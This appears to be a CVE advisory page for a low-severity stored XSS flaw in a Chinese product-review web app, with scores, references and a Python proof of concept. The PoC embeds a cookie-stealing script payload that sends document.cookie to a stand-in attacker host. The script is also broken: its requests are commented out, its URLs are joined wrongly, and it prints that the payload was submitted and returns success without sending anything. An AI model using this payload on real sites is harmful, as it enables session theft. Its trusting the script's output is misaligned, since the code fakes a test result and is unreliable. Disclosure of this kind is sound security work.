Security Vulnerability Report
CVE-2025-15248 CVSS 3.5 LOW

Published: 2025-12-30 13:16:23
Last Modified: 2026-04-29 01:00:02

Description

A security flaw has been discovered in sunhailin12315 product-review 商品评价系统 up to 91ead6890b4065bb45b7602d0d73348e75cb4639. It affects an unknown part of the Write a Review component. Manipulating the argument content results in cross-site scripting. The attack can be carried out remotely. An exploit has been released to the public and may be used. This product adopts a rolling release strategy to maintain continuous delivery. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No structured configuration data available; the affected range below is taken from the description.

sunhailin12315/product-review < 91ead6890b4065bb45b7602d0d73348e75cb4639

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-15248 XSS PoC
# Target: sunhailin12315/product-review
# Attack Vector: Write a Review - content parameter

target_url = "http://target-site.com/review/submit"  # Replace with actual target

# Malicious XSS payload
xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>"


# PoC for testing XSS vulnerability in review submission
def test_xss_vulnerability():
    """
    Test if the target is vulnerable to CVE-2025-15248

    Steps:
    1. Authenticate with low-privilege account
    2. Submit a review with XSS payload in 'content' parameter
    3. Verify the payload is stored without sanitization
    4. Check if the script executes when viewing the review
    """
    session = requests.Session()

    # Step 1: Login with low-privilege account
    login_data = {
        "username": "attacker_account",
        "password": "password123"
    }
    # login_response = session.post(f"{target_url}/login", data=login_data)

    # Step 2: Submit review with XSS payload
    review_data = {
        "content": xss_payload,
        "product_id": "12345"
    }
    # submit_response = session.post(f"{target_url}/review/submit", data=review_data)

    print("[+] XSS payload submitted in content parameter")
    print(f"[+] Payload: {xss_payload}")
    print("[+] If vulnerable, script will execute when review is viewed")
    return True


if __name__ == "__main__":
    test_xss_vulnerability()
```

References

https://gitee.com/sunhailin12315/product-review/issues/ICK775
https://vuldb.com/?ctiid.338638
https://vuldb.com/?id.338638

Record Metadata (from the raw NVD JSON)

Vulnerability Status
Deferred
Weaknesses
CWE-79, CWE-94
CVSS 4.0 Vector (Secondary)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVSS 4.0 Score
2.0 LOW (exploit maturity: PROOF_OF_CONCEPT)
CVSS 3.1 Vector (Primary)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
CVSS 3.1 Score
3.5 LOW (exploitability 2.1, impact 1.4)
CVSS 2.0 Vector (Secondary)
AV:N/AC:L/Au:S/C:N/I:P/A:N
CVSS 2.0 Score
4.0 MEDIUM (exploitability 8.0, impact 2.9)